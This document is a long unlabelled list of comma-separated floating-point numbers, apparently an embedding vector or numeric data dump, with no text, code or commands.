-0.014857964590191841, 0.012194744311273098, 0.002513316459953785, 0.0010590582387521863, 0.019732747226953506, 0.0019633460324257612, -0.01906304806470871, 0.014305073767900467, -0.01900075189769268, 0.03448168933391571, -0.033235739916563034, -0.02987167239189148, 0.03697359189391136, -0.012272615917026997, -0.043390240520238876, -0.009601608850061893, 0.00792736280709505, 0.02616496942937374, 0.03205208480358124, 0.030105289071798325, -0.012989037670195103, -0.037347376346588135, 0.017240844666957855, 0.02370421588420868, 0.04691005125641823, -0.016103915870189667, -0.016135064885020256, 0.0009729124139994383, -0.02776912972331047, 0.011174621991813183, -0.02783142775297165, 0.021819714456796646, -0.008083106018602848, -0.026881391182541847, -0.0320209376513958, 0.01655557192862034, -0.04485423117876053, 0.020262276753783226, 0.017069527879357338, 0.028174065053462982, -0.02272302843630314, 0.006241435185074806, -0.03638176620006561, -0.014772305265069008, -0.007226515095680952, 0.010201223194599152, 0.02105657011270523, 0.006003926042467356, -0.011205771006643772, -0.011236920021474361, -0.0005889064632356167, 0.018922878429293633, -0.005591204389929771, -0.024296041578054428, 0.054292310029268265, -0.017085101455450058, 0.013978011906147003, -0.006151882465928793, -0.00851140171289444, -0.03175617381930351, 0.03041677549481392, 0.021414780989289284, 0.02985609881579876, -0.035322707146406174, 0.00847246591001749, -0.0014630189398303628, -0.018128585070371628, -0.006486731581389904, -0.018128585070371628, -0.022956645116209984, 0.040306512266397476, 0.001261525321751833, -0.03385871648788452, 0.005602885503321886, 0.02474769949913025, 0.07562921941280365, -0.011307003907859325, 0.09070522338151932, -0.010839772410690784, -0.03666210547089577, 0.012373849749565125, -0.010948793031275272, 0.020713932812213898, -0.01282550673931837, -0.00106295186560601, 0.011525046080350876, -0.010061053559184074, 0.01108896266669035, -0.006996792741119862, 0.011929979547858238, -0.03079056181013584, -0.001143743982538581, 0.005746948532760143, 0.005824820604175329, 0.0347931794822216, -0.005910479463636875, 0.009881948120892048, 0.0005903665442019701, -0.0060584363527596, 0.0067670708522200584, -0.0013608119916170835, 0.004006510600447655, -0.004041553009301424, 0.013027974404394627, 0.029933970421552658, -0.00927454698830843, 0.02409357577562332, 0.028516700491309166, -0.005844288505613804, -0.02725517563521862, 0.03091515600681305, 0.004368615336716175, -0.012654189020395279, -0.008869612589478493, 0.032768506556749344, 0.015683406963944435, -0.007966298609972, 0.026569902896881104, -0.01750561036169529, 0.0461001843214035, 0.04077374190092087, -0.01753675937652588, -0.04725268855690956, 0.00045409068115986884, 0.0190163254737854, -0.016882633790373802, 0.01392350159585476, 0.019950788468122482, 0.009329057298600674, 0.013292738236486912, 0.009430291131138802, 0.015535450540482998, -0.02057376317679882, -0.01744331233203411, 0.011159047484397888, -0.009523737244307995, -0.015005921013653278, 0.0464116707444191, 0.011828746646642685, -0.05656617134809494, -0.0007334562251344323, -0.01312920730561018, 0.03311114385724068, -0.029015081003308296, -0.02924869768321514, -0.012833294458687305, -0.01946798339486122, 0.0032647806219756603, 0.023299282416701317, 0.04161475971341133, -0.0000049392401706427336, 0.041427865624427795, 0.05058560520410538, 0.018720412626862526, 0.019218793138861656, 0.04379517212510109, -0.033640675246715546, -0.01910977251827717, -0.019654875621199608, 0.010972155258059502, -0.019904065877199173, -0.025012463331222534, -0.01703837886452675, -0.0012469242792576551, -0.0011242759646847844, -0.011252493597567081, -0.02060491219162941, 0.03242587298154831, -0.019670449197292328, 0.00019942515064030886, -0.02270745486021042, -0.00032292515970766544, -0.04849863797426224, -0.026055948808789253, -0.0024802209809422493, 0.02100984752178192, 0.002998069394379854, 0.02773798070847988, -0.03709818795323372, -0.01232712622731924, 0.01643097773194313, -0.05042986199259758, -0.007051303517073393, -0.001793974544852972, 0.048156000673770905, 0.0059221601113677025, 0.022302521392703056, 0.015745704993605614, -0.001567172585055232, -0.05307750776410103, -0.03765886649489403, -0.013144781813025475, 0.004446487408131361, -0.04385747015476227, 0.0074873859994113445, -0.017131824046373367, -0.03669325262308121, 0.017770374193787575, 0.01316814310848713, 0.011291430331766605, -0.005279717035591602, -0.024062426760792732, -0.002458806149661541, -0.003173281205818057, 0.012280403636395931, -0.03491777181625366, -0.010917644947767258, 0.014741156250238419, 0.020994272083044052, 0.005735267885029316, -0.021757418289780617, 0.02926427125930786, -0.0075652580708265305, -0.028656870126724243, -0.023579619824886322, -0.008931910619139671, 0.009850799106061459, -0.0017443312099203467, 0.05494643375277519, -0.010349179618060589, 0.0010123350657522678, 0.002240764908492565, 0.00021609460236504674, 0.01750561036169529, 0.021383631974458694, 0.02102542109787464, 0.025448547676205635, -0.0055289072915911674, 0.006171350367367268, -0.011782023124396801, 0.008168765343725681, -0.05282831937074661, -0.01752118393778801, 0.028392106294631958, 0.04669201001524925, -0.005618460010737181, 0.03644406422972679, 0.021368058398365974, 0.01854909397661686, -0.051738109439611435, -0.026538753882050514, 0.013510779477655888, -0.042891860008239746, 0.009881948120892048, -0.047595322132110596, 0.019904065877199173, -0.020184405148029327, 0.02266073226928711, 0.01953027956187725, 0.007343322969973087, -0.05983678996562958, -0.000963178463280201, -0.029201973229646683, -0.0033037166576832533, 0.02571331150829792, 0.004061021376401186, 0.0016372572863474488, -0.0017199962167069316, 0.0037553738802671432, -0.0015642524231225252, -0.02359519526362419, 0.05292176455259323, 0.0028871018439531326, -0.0380326509475708, -0.004695677198469639, 0.0042712753638625145, 0.0036736084148287773, 0.01366652362048626, -0.003387429052963853, -0.005852075759321451, 0.009469226934015751, 0.0019847608637064695, 0.04426240548491478, -0.01417269092053175, -0.01912534609436989, 0.016244085505604744, -0.004648954141885042, -0.04307875037193298, 0.036257170140743256, 0.04002617299556732, 0.010730751790106297, 0.026990411803126335, -0.0027118900325149298, -0.040431104600429535, 0.052205342799425125, 0.039309751242399216, -0.00873723067343235, 0.010598369874060154, -0.012194744311273098, 0.055382516235113144, 0.0038702350575476885, -0.004407551139593124, -0.03915400803089142, 0.028501126915216446, -0.023953406140208244, -0.030167585238814354, -0.034668583422899246, 0.023984555155038834, 0.03669325262308121, 0.007557470817118883, -0.0063037327490746975, 0.022442691028118134, 0.029466738924384117, -0.004512678366154432, 0.04416896030306816, 0.013767757453024387, -0.03227012977004051, 0.0046022310853004456, 0.013549716211855412, -0.033173441886901855, -0.0268035177141428, 0.03868677467107773, -0.0304012019187212, 0.0010658720275387168, -0.014048096723854542, 0.015138302929699421, -0.03382756561040878, 0.013183717615902424, -0.03153813257813454, 0.005781990941613913, 0.003027271246537566, 0.002349785529077053, 0.02630513720214367, -0.02987167239189148, 0.00045822764514014125, 0.014912474900484085, -0.017162973061203957, -0.01588587462902069, 0.006393285468220711, 0.05665961652994156, -0.008371232077479362, -0.000252597063081339, -0.020386870950460434, -0.001913702697493136, 0.008301148191094398, -0.02062048763036728, 0.011696363799273968, -0.03041677549481392, 0.011439386755228043, -0.006116840057075024, 0.020262276753783226, 0.017334291711449623, -0.010497136041522026, 0.013487418182194233, -0.007502960506826639, 0.03663095459342003, -0.03915400803089142, 0.043390240520238876, -0.009469226934015751, -0.020963123068213463, -0.015231749974191189, 0.00475797476246953, -0.01745888590812683, 0.03962123766541481, 0.026414159685373306, 0.0059182667173445225, -0.03616372495889664, -0.006735921837389469, -0.025573141872882843, 0.024342766031622887, 0.003253099974244833, 0.017240844666957855, 0.0012722326209768653, -0.008106468245387077, 0.010559434071183205, -0.0067164539359509945, -0.01650884933769703, -0.010302456095814705, 0.03298655152320862, -0.0330488458275795, 0.03035447932779789, 0.006440008524805307, 0.008223275654017925, 0.012381636537611485, 0.019390109926462173, -0.043421387672424316, -0.005715799517929554, -0.026616625487804413, -0.004064914770424366, 0.0050694625824689865, -0.0002085507585434243, 0.002565880073234439, -0.008885187096893787, -0.014336222782731056, 0.0007908868137747049, -0.020745081827044487, 0.03404560685157776, -0.015519876033067703, 0.019265515729784966, -0.015512088313698769, -0.013339461758732796, -0.03849988058209419, 0.012755421921610832, 0.011634066700935364, 0.020900826901197433, 0.025417398661375046, -0.012241467833518982, 0.030245458707213402, 0.015480940230190754, -0.01806628704071045, -0.0008838464273139834, -0.005085037089884281, 0.04672315716743469, 0.034699730575084686, 0.011439386755228043, 0.0237197894603014, 0.004578869324177504, -0.024965740740299225, -0.02678794413805008, -0.037908054888248444, -0.01516945194453001, -0.0013121420051902533, -0.01516166515648365, -0.009391354396939278, 0.0060584363527596, -0.010956580750644207, -0.009897522628307343, 0.004442593548446894, 0.008931910619139671, -0.02315911278128624, 0.006587965413928032, 0.012989037670195103, 0.011454961262643337, 0.025308378040790558, -0.020822953432798386, -0.00770153384655714, 0.042393479496240616, 0.026569902896881104, -0.005116185639053583, 0.03379641845822334, -0.002867633942514658, 0.004590550437569618, 0.007534109055995941, 0.02359519526362419, -0.0066619436256587505, -0.024031277745962143, -0.014421881176531315, 0.010870921425521374, -0.02470097690820694, 0.006015606690198183, 0.016244085505604744, 0.00011054163769586012, -0.014811241067945957, -0.010240158997476101, 0.025541992858052254, 0.009843012318015099, 0.020464742556214333, 0.02421816997230053, -0.026367435231804848, -0.01312142051756382, 0.020293425768613815, 0.026460882276296616, -0.018144160509109497, -0.027442067861557007, -0.0371604859828949, 0.006899453233927488, 0.024981316179037094, -0.021866438910365105, -0.018268754705786705, -0.012475083582103252, -0.023346005007624626, 0.008994207717478275, -0.0039013836067169905, 0.01205457467585802, 0.022395966574549675, 0.00981965009123087, -0.029155250638723373, 0.0283453818410635, 0.03460628539323807, 0.022800901904702187, -0.0014250563690438867, 0.018938453868031502, 0.016742464154958725, 0.006050649099051952, -0.006264796946197748, -0.0031577066984027624, 0.025012463331222534, 0.021430354565382004, 0.01520838774740696, -0.017754800617694855, -0.01854909397661686, 0.02009095810353756, -0.014748943969607353, -0.008340083993971348, 0.008589274249970913, 0.005046101287007332, 0.0059143733233213425, -0.006237541791051626, -0.0020090958569198847, -0.01851794496178627, 0.021897586062550545, -0.008581486530601978, -0.01564447022974491, -0.014881325885653496, -0.005828713998198509, 0.007658704183995724, 0.020822953432798386, -0.026912538334727287, 0.012669763527810574, -0.022504987195134163, -0.012763209640979767, -0.014320648275315762, 0.00425180746242404, -0.03357837721705437, -0.003052579704672098, 0.009134377352893353, 0.009624970145523548, -0.00874501746147871, -0.01910977251827717, -0.0010794996051117778, -0.0027041027788072824, -0.02157052420079708, 0.00026768475072458386, 0.07463245838880539, -0.01516945194453001, -0.005626246798783541, 0.0016567253042012453, 0.01848679594695568, 0.012342700734734535, -0.02118116430938244, -0.04466734081506729, 0.01641540229320526, 0.015488727018237114, 0.02052704058587551, 0.02879703976213932, 0.0006390365306288004, 0.03258161619305611, 0.036319468170404434, -0.013308312743902206, 0.01904747448861599, -0.04750187695026398, -0.021772991865873337, -0.007203153800219297, -0.010738539509475231, 0.025931352749466896, 0.04323449730873108, 0.01752118393778801, -0.017209697514772415, 0.017770374193787575, 0.013728821650147438, 0.018907304853200912, 0.007639236282557249, -0.018315477296710014, -0.033765267580747604, 0.00038522269460372627, 0.008519189432263374, 0.002112276153638959, 0.004528252873569727, -0.010388115420937538, 0.022504987195134163, -0.013448482379317284, -0.022255796939134598, 0.017256420105695724, -0.011828746646642685, 0.014530901797115803, 0.005112292245030403, -0.02521493099629879, 0.014865751378238201, 0.026102671399712563, 0.002723570680245757, 0.01386120356619358, -0.00682936841621995, 0.015278472565114498, -0.00719925994053483, 0.008838464505970478, 0.009352418594062328, 0.0005562976002693176, 0.02206890471279621, 0.0013179824454709888, 0.0007159350789152086, -0.012568529695272446, -0.0003932532563339919, -0.01742773875594139, 0.006556816399097443, 0.000863405002746731, 0.02208448015153408, -0.001091180369257927, 0.004948761314153671, 0.028734741732478142, -0.006883878726512194, -0.026367435231804848, -0.005957202520221472, -0.024311617016792297, -0.011898830533027649, -0.017085101455450058, 0.010730751790106297, 0.015231749974191189, 0.022302521392703056, -0.0031830151565372944, -0.005178483203053474, -0.028688019141554832, -0.05192500352859497, -0.030588094145059586, 0.011602917686104774, 0.02001308649778366, 0.021274611353874207, 0.02523050457239151, -0.0037436929997056723, 0.012436146847903728, 0.015636684373021126, -0.05765637755393982, 0.0007388099329546094, 0.04937080293893814, -0.006140201818197966, -0.002018829807639122, 0.00953931175172329, 0.014912474900484085, -0.004921506159007549, -0.002585348207503557, -0.002207669196650386, -0.015410855412483215, 0.014530901797115803, -0.01647770032286644, -0.009695054963231087, 0.028111767023801804, -0.008955271914601326, -0.00876837968826294, 0.00014722661580890417, -0.020449168980121613, 0.024451786652207375, 0.016851486638188362, 0.04519686847925186, 0.006615220569074154, 0.027473216876387596, 0.030042991042137146, -0.003879969008266926, -0.002855953061953187, -0.012249254621565342, 0.024872293695807457, -0.011377088725566864, -0.00087070552399382, -0.04173935577273369, 0.019888490438461304, 0.03041677549481392, -0.0007655784138478339, 0.03659980744123459, 0.007027941755950451, -0.0010941006476059556, 0.018689263612031937, -0.02778470516204834, -0.031179921701550484, -0.03128894045948982, -0.03719163313508034, 0.024919018149375916, 0.007865064777433872, -0.04423125833272934, -0.018782708793878555, 0.01262304000556469, 0.003494502976536751, 0.005622353404760361, -0.034263648092746735, -0.009858586825430393, -0.008285573683679104, -0.010170074179768562, 0.03688014671206474, -0.01697608083486557, -0.015449791215360165, 0.0039169578813016415, 0.04566410183906555, -0.01258410420268774, -0.011875469237565994, -0.011758661828935146, 0.03147583454847336, -0.02881261520087719, -0.0011602917220443487, -0.031039752066135406, 0.010621731169521809, 0.0013695725938305259, 0.033734120428562164, -0.04002617299556732, -0.013837842270731926, 0.0025717203970998526, -0.014974771998822689, -0.025370674207806587, -0.02157052420079708, 0.0011846267152577639, -0.0007388099329546094, 0.00602339394390583, 0.0018105224007740617, 0.024934591725468636, -0.009562673047184944, 0.019421258941292763, 0.00022035323490854353, -0.015909235924482346, 0.020449168980121613, -0.004224552307277918, 0.013526353985071182, 0.009640544652938843, -0.031616002321243286, 0.003443886060267687, -0.03747197240591049, -0.013744396157562733, -0.0062764775939285755, -0.009586034342646599, -0.010450413450598717, -0.023003367707133293, -0.015091580338776112, 0.02262958325445652, 0.015683406963944435, -0.004469848703593016, -0.004162254743278027, 0.018362201750278473, -0.03141353651881218, -0.008488040417432785, -0.0143907330930233, 0.033734120428562164, 0.012233680114150047, 0.012459509074687958, -0.03133566305041313, 0.05974334478378296, 0.005135654006153345, -0.03030775487422943, -0.00900199543684721, -0.012482870370149612, 0.04208199307322502, -0.00873723067343235, -0.0431721992790699, -0.0007967271958477795, -0.017692502588033676, -0.003517864504829049, 0.025510843843221664, 0.024825571104884148, -0.0017199962167069316, 0.034730881452560425, -0.012700911611318588, 0.01689820922911167, 0.0484674908220768, -0.00022485520457848907, 0.005848181899636984, -0.011377088725566864, 0.01953027956187725, -0.00904093123972416, 0.01570676825940609, 0.009157738648355007, -0.0015107154613360763, -0.03868677467107773, 0.029497887939214706, -0.01462434884160757, 0.005275823175907135, 0.0035353857092559338, -0.024031277745962143, -0.005754735786467791, 0.005365375895053148, 0.019390109926462173, -0.009663906879723072, 0.018299903720617294, 0.010933219455182552, 0.022271372377872467, 0.009858586825430393, -0.05438575521111488, -0.0067164539359509945, 0.008355658501386642, -0.03915400803089142, -0.026414159685373306, 0.019717173650860786, -0.01127585582435131, 0.003412737278267741, -0.012303764931857586, -0.049059316515922546, -0.014811241067945957, 0.028469977900385857, 0.009445864707231522, -0.04236232861876488, -0.056846510618925095, 0.02264515683054924, -0.005493864882737398, -0.023579619824886322, -0.05868428573012352, -0.004878676496446133, 0.001327716396190226, -0.007362790871411562, 0.04170820489525795, 0.007853384129703045, 0.01750561036169529, -0.04027536138892174, 0.021305760368704796, 0.022754177451133728, -0.0019974149763584137, -0.010209009982645512, -0.02322140894830227, 0.025837905704975128, -0.028968358412384987, -0.023268133401870728, -0.014382945373654366, 0.021321333944797516, -0.02977822534739971, -0.04840519279241562, 0.002686581574380398, -0.021695120260119438, 0.008192126639187336, 0.0011379035422578454, 0.019281089305877686, -0.008410168811678886, 0.017661353573203087, 0.034139055758714676, 0.014530901797115803, 0.023439450189471245, -0.012498444877564907, -0.010652880184352398, 0.02010653167963028, -0.014087032526731491, -0.0003124611102975905, 0.000764605007134378, -0.01238942425698042, -0.036288321018218994, -0.0037651078309863806, 0.005688544362783432, 0.015107154846191406, 0.02161724865436554, -0.020994272083044052, 0.009765139780938625, -0.006077904254198074, -0.011680789291858673, 0.011563981883227825, 0.004933186806738377, -0.009983181953430176, 0.030105289071798325, -0.006237541791051626, -0.0005850128945894539, -0.04021306335926056, -0.011127898469567299, -0.007763831410557032, 0.0007821262115612626, 0.006825474556535482, 0.01588587462902069, 0.03329803794622421, -0.0474395789206028, 0.023859959095716476, -0.001393907587043941, 0.0012965676141902804, -0.023501748219132423, 0.0050967177376151085, -0.0019730799831449986, -0.011018877848982811, -0.00028179906075820327, 0.020262276753783226, -0.008090893737971783, 0.039403196424245834, 0.040431104600429535, -0.009375780820846558, 0.015052644535899162, 0.022956645116209984, 0.032238978892564774, 0.014141542837023735, -0.05033641681075096, 0.04460504278540611, 0.020807379856705666, 0.007393939886242151, -0.008114255033433437, -0.02005980908870697, 0.03088400699198246, -0.050616756081581116, -0.0066385818645358086, 0.03245702013373375, 0.02825193665921688, -0.03192749246954918, -0.02362634427845478, -0.003547066356986761, -0.03507351875305176, -0.005591204389929771, 0.01854909397661686, 0.003360173897817731, 0.007234302349388599, -0.06089584901928902, -0.005100611597299576, 0.020900826901197433, 0.019654875621199608, -0.03538500517606735, -0.021212313324213028, 0.006977324839681387, -0.02942001447081566, 0.02717730402946472, 0.014725581742823124, -0.021757418289780617, -0.03174059838056564, 0.03607027977705002, 0.00034531333949416876, 0.02579118311405182, 0.012443934567272663, -0.01702280342578888, 0.02616496942937374, 0.026024799793958664, 0.0221779253333807, -0.016664592549204826, -0.006521773990243673, -0.0006439035059884191, -0.0050694625824689865, 0.03663095459342003, 0.00773657625541091, 0.005813139490783215, -0.015068218111991882, 0.015379706397652626, -0.003977308981120586, 0.025043612346053123, 0.0030895688105374575, 0.0047346134670078754, -0.011299217119812965, -0.01540306769311428, 0.007884533144533634, 0.003052579704672098, 0.011789809912443161, -0.016244085505604744, 0.028438828885555267, -0.0003939832968171686, 0.010131138376891613, -0.022333670407533646, 0.012716486118733883, -0.01286444254219532, -0.020854102447628975, 0.029560184106230736, 0.0411163792014122, -0.006751496344804764, -0.023455025628209114, -0.025588715448975563, -0.006342668551951647, -0.011026665568351746, -0.00475797476246953, 0.034170202910900116, -0.01462434884160757, -0.02057376317679882, 0.030494647100567818, 0.014982559718191624, 0.013713247142732143, -0.006471157539635897, -0.001939011039212346, -0.009157738648355007, -0.003118770895525813, -0.027613386511802673, -0.021430354565382004, -0.008526976220309734, -0.002842325484380126, 0.002787815174087882, 0.007479598745703697, 0.009936458431184292, 0.006494518835097551, -0.02107214368879795, 0.02161724865436554, 0.0110500268638134, -0.01136151421815157, -0.0010376435238867998, -0.007841703481972218, 0.015652257949113846, -0.014266137965023518, -0.027566663920879364, 0.003889702958986163, -0.023548472672700882, 0.0009617183241061866, -0.0221000537276268, -0.0173965897411108, 0.015808001160621643, 0.05491528660058975, 0.022302521392703056, -0.020480317994952202, 0.016773613169789314, -0.03198979049921036, -0.016041617840528488, -0.025105910375714302, 0.0023614661768078804, -0.021150017157197, -0.014546476304531097, -0.020464742556214333, -0.02568216249346733, -0.01960815116763115, -0.009920883923768997, 0.001100914436392486, -0.005408205557614565, 0.002883208217099309, 0.056877657771110535, 0.007024048361927271, 0.003054526401683688, -0.009220036678016186, -0.017162973061203957, -0.008900761604309082, 0.010419264435768127, -0.0059455218724906445, 0.012366062961518764, -0.014546476304531097, 0.03703588992357254, -0.02057376317679882, -0.023346005007624626, 0.012576316483318806, -0.00303116487339139, 0.00199352134950459, -0.007086345460265875, -0.0011495844228193164, 0.0019545855466276407, 0.00020246702479198575, -0.01566004566848278, 0.013277163729071617, -0.013059122487902641, -0.0006599646294489503, -0.022520562633872032, 0.006654156371951103, -0.021741842851042747, 0.011501683853566647, 0.0024257106706500053, -0.0034477796871215105, 0.0011671055108308792, 0.009118802845478058, -0.003120717592537403, -0.02158609963953495, -0.00001111043820856139, 0.00461780559271574, 0.00212785042822361, -0.006042861845344305, -0.025370674207806587, -0.02719287760555744, 0.014951410703361034, -0.009399142116308212, -0.019872916862368584, 0.031584855169057846, -0.0019857343286275864, -0.005034420173615217, -0.004917612299323082, -0.012194744311273098, -0.04638052359223366, -0.01132257841527462, -0.0370047427713871, -0.016586720943450928, -0.005501651670783758, 0.03544730320572853, -0.009142165072262287, 0.004158360883593559, -0.017567908391356468, 0.019670449197292328, -0.011525046080350876, 0.015589960850775242, -0.005933841224759817, -0.008752805180847645, 0.005805352237075567, -0.030743837356567383, -0.011470535770058632, 0.024529658257961273, -0.013830054551362991, -0.010917644947767258, -0.009959819726645947, 0.029544610530138016, 0.00176671938970685, -0.00615966971963644, 0.0031538130715489388, -0.0021453716326504946, 0.011384876444935799, 0.016353106126189232, 0.0030370051972568035, 0.04382632300257683, 0.012693124823272228, -0.02312796376645565, -0.02471655048429966, 0.03809494897723198, -0.008075319230556488, 0.009266759268939495, -0.009570459835231304, 0.03351607918739319, -0.01859581656754017, -0.025386249646544456, 0.012996825389564037, -0.0001501468213973567, -0.006837155669927597, 0.04027536138892174, 0.01578463986515999, 0.00792736280709505, 0.0008249557577073574, 0.04631822556257248, 0.016057191416621208, 0.001196307479403913, -0.006891665980219841, 0.022832050919532776, -0.0011252494296059012, -0.001300461241044104, 0.01389235258102417, 0.008713869377970695, -0.031008603051304817, 0.016711317002773285, 0.007713214494287968, 0.006911133881658316, -0.005684650968760252, -0.0066853053867816925, -0.028578998520970345, -0.0008965005981735885, -0.01104224007576704, -0.008822889998555183, -0.010613944381475449, 0.0036346723791211843, 0.00015537883155047894, 0.022972218692302704, 0.020900826901197433, 0.009874160401523113, -0.015605534426867962, -0.01999751105904579, 0.015745704993605614, 0.028407679870724678, 0.03083728440105915, 0.001342317438684404, -0.019904065877199173, -0.00032219511922448874, 0.017178548499941826, 0.02051146700978279, -0.003959787543863058, -0.022255796939134598, 0.0008015941712073982, -0.013425121083855629, 0.019654875621199608, 0.01078526210039854, -0.0020090958569198847, 0.004637273494154215, -0.014040309004485607, 0.0032842487562447786, -0.013604226522147655, 0.04173935577273369, 0.004594443831592798, 0.027395345270633698, -0.008581486530601978, 0.0016567253042012453, -0.0062725841999053955, -0.002787815174087882, 0.016586720943450928, 0.02007538452744484, -0.0190163254737854, -0.009983181953430176, 0.004785229917615652, 0.017599055543541908, -0.0007246956811286509, -0.022364817559719086, 0.009064292535185814, -0.02057376317679882, -0.0031499196775257587, 0.004029872361570597, 0.0021843076683580875, 0.02058933861553669, 0.015301834791898727, -0.002618443686515093, 0.017879394814372063, 0.008184339851140976, 0.0054821837693452835, -0.008620422333478928, -0.04233118146657944, -0.001579826814122498, -0.005003271624445915, -0.003239472396671772, -0.002817017026245594, 0.0023828810080885887, -0.012436146847903728, 0.024872293695807457, -0.014242775738239288, 0.01963930018246174, -0.0008259291644208133, 0.002248551929369569, 0.0014912474434822798, 0.004049340263009071, -0.011454961262643337, -0.013456269167363644, 0.008417955599725246, -0.007382259238511324, 0.005369269754737616, -0.008581486530601978, -0.03874907270073891, 0.0005811192677356303, 0.011174621991813183, 0.023813236504793167, -0.007709321100264788, -0.023844385519623756, -0.011641853488981724, 0.00032608871697448194, -0.022863198071718216, -0.01854909397661686, 0.037316229194402695, -0.017178548499941826, -0.013783331960439682, 0.0007417301530949771, 0.0030739945359528065, -0.009196675382554531, 0.0032861954532563686, -0.032114382833242416, 0.02206890471279621, 0.00011607784836087376, 0.014328435063362122, 0.021321333944797516, -0.002244658302515745, 0.017848245799541473, -0.0020928080193698406, -0.004948761314153671, -0.010847560130059719, 0.010427051223814487, -0.02062048763036728, -0.0021609461400657892, -0.011891043744981289, -0.003558747237548232, -0.03610142692923546, 0.019950788468122482, -0.010333605110645294, -0.0009660986252129078, 0.0009325163555331528, 0.020153256133198738, 0.015589960850775242, -0.027504365891218185, -0.0028131233993917704, 0.026632200926542282, 0.013752182945609093, 0.008721656166017056, -0.0031285048462450504, -0.0033679609186947346, -0.007281025405973196, 0.013448482379317284, -0.02829865925014019, -0.01948355697095394, -0.027037134394049644, 0.017785949632525444, -0.005170696415007114, -0.012257041409611702, -0.013027974404394627, 0.0014114287914708257, -0.009453652426600456, -0.00027668869006447494, 0.020791806280612946, -0.010333605110645294, -0.019763896241784096, 0.009212248958647251, 0.001489300630055368, 0.012467295862734318, -0.0062258606776595116, -0.0021220101043581963, -0.01490468718111515, -0.014336222782731056, -0.011976703070104122, -0.0017764534568414092, 0.013059122487902641, 0.012171383015811443, 0.025339527055621147, 0.002639858517795801, 0.016742464154958725, -0.005162909161299467, -0.01003769226372242, 0.016290808096528053, 0.013814480043947697, 0.011384876444935799, -0.0221779253333807, 0.0045983376912772655, 0.011416025459766388, 0.013541928492486477, 0.01209351047873497, -0.01546536572277546, -0.015076005831360817, -0.00048280597548000515, -0.000617621757555753, -0.011291430331766605, -0.012669763527810574, 0.0031927491072565317, 0.01335503626614809, 0.028033895418047905, 0.007647023536264896, 0.0070668775588274, 0.02305009216070175, 0.02255171164870262, 0.003556800540536642, -0.01212465949356556, -0.003307610284537077, 0.018299903720617294, 0.02214677631855011, 0.023018943145871162, -0.02317468635737896, -0.008067532442510128, 0.009430291131138802, 0.023579619824886322, -0.013502992689609528, 0.002100595273077488, 0.027909299358725548, -0.013534141704440117, 0.008425743319094181, 0.023330429568886757, 0.0019497184548527002, 0.01699165441095829, -0.03141353651881218, 0.02100984752178192, 0.02730189822614193, 0.0033854821231216192, -0.0078767454251647, -0.006584071554243565, -0.0021979352459311485, 0.017676929011940956, 0.003093462437391281, -0.016586720943450928, 0.0007675252272747457, 0.00552112003788352, -0.0047346134670078754, 0.00041101776878349483, 0.008301148191094398, -0.008565912023186684, -0.011159047484397888, -0.004057127516716719, -0.026881391182541847, -0.036755550652742386, -0.009850799106061459, -0.004722932353615761, 0.007783299311995506, -0.003490609349682927, -0.018704837188124657, -0.009399142116308212, 0.002098648576065898, 0.018424497917294502, -0.0032881421502679586, 0.003733959048986435, -0.014188265427947044, 0.017879394814372063, -0.0010298562701791525, 0.023828810080885887, -0.0020811273716390133, -0.0009865399915724993, -0.03432594612240791, 0.011439386755228043, -0.0007981872768141329, 0.012599678710103035, 0.002363413106650114, -0.021336909383535385, 0.006015606690198183, 0.003282301826402545, -0.009142165072262287, -0.00904871802777052, -0.0175523329526186, 0.012802145443856716, -0.003928638994693756, 0.0411163792014122, 0.004964335355907679, -0.0024120830930769444, 0.007230408955365419, 0.009702842682600021, 0.022863198071718216, 0.031070901080965996, 0.0018708731513470411, -0.0009101281757466495, -0.01316814310848713, -0.0011486109578981996, 0.004976016469299793, -0.0037436929997056723, -0.010746326297521591, 0.02420259639620781, 0.0008488040184602141, 0.012770996429026127, -0.007779405917972326, -0.02255171164870262, 0.012841081246733665, 0.0018134425627067685, -0.01602604240179062, -0.010450413450598717, 0.0067398156970739365, 0.00602728733792901, -0.005186270456761122, 0.005630140658468008, 0.004582763183861971, -0.006385498214513063, -0.01750561036169529, 0.011299217119812965, 0.008114255033433437, -0.003953947219997644, -0.021430354565382004, -0.026071522384881973, -0.005855969153344631, 0.006572390906512737, 0.022956645116209984, -0.00529529107734561, -0.003827405394986272, 0.008379019796848297, -0.0018757401267066598, 0.01689820922911167, 0.008059744723141193, -0.015122729353606701, 0.014406307600438595, -0.01054385956376791, 0.0014513380592688918, -0.01417269092053175, 0.004703464452177286, 0.0031421324238181114, 0.013464056886732578, 0.006887772120535374, -0.009469226934015751, -0.013471843674778938, 0.01162627898156643, -0.003905277233570814, 0.022800901904702187, -0.0046333796344697475, 0.025931352749466896, -0.004473742563277483, -0.01914091967046261, -0.024264894425868988, 0.0013569183647632599, -0.0038585541769862175, -0.007939043454825878, 0.010559434071183205, -0.004691783804446459, 0.011384876444935799, -0.004831953439861536, -0.0009607449173927307, -0.004831953439861536, -0.015317408367991447, -0.016835911199450493, -0.01131479162722826, -0.028142916038632393, -0.014974771998822689, -0.007635342888534069, -0.005871543660759926, 0.030152011662721634, -0.0015710662119090557, 0.030089713633060455, -0.009367993101477623, -0.008036383427679539, 0.003225844819098711, -0.01080862432718277, 0.0063270945101976395, -0.0029591333586722612, -0.015800215303897858, 0.007323855068534613, -0.0015924809267744422, -0.0009422503644600511, 0.002680741250514984, -0.021913161501288414, 0.008083106018602848, 0.004072702024132013, -0.011704151518642902, 0.03037005290389061, 0.018891729414463043, 0.013316100463271141, 0.006545135751366615, 0.0038838626351207495, -0.008534763939678669, -0.002550305798649788, 0.011470535770058632, 0.00923561118543148, -0.0015778800006955862, 0.020199978724122047, -0.008589274249970913, -0.004045446868985891, -0.013970224186778069, 0.018159734085202217, 0.021196739748120308, 0.00974956527352333, -0.011641853488981724, 0.0054276734590530396, 0.0015077952994033694, 0.006401072721928358, -0.009352418594062328, -0.00904093123972416, 0.010481561534106731, -0.00015221528883557767, 0.01963930018246174, -0.02007538452744484, 0.0004178315866738558, -0.0027060494758188725, -0.003809884190559387, 0.026507604867219925, 0.03348492830991745, 0.0036190978717058897, -0.014421881176531315, -0.006802113261073828, 0.0087761664763093, 0.008643784560263157, 0.0011116218520328403, -0.004571082536131144, -0.003107090014964342, -0.0007417301530949771, -0.018751561641693115, -0.020885251462459564, -0.0024899549316614866, 0.001541864243336022, 0.008924122899770737, 0.0023809343110769987, -0.00022083992371335626, -0.021212313324213028, 0.0016946878749877214, 0.009827437810599804, -0.003963681403547525, -0.007327748462557793, -0.019763896241784096, -0.017334291711449623, -0.012661975808441639, 0.00425180746242404, -0.002883208217099309, -0.0002616010024212301, -0.008534763939678669, -0.013705459423363209, -0.012529593892395496, 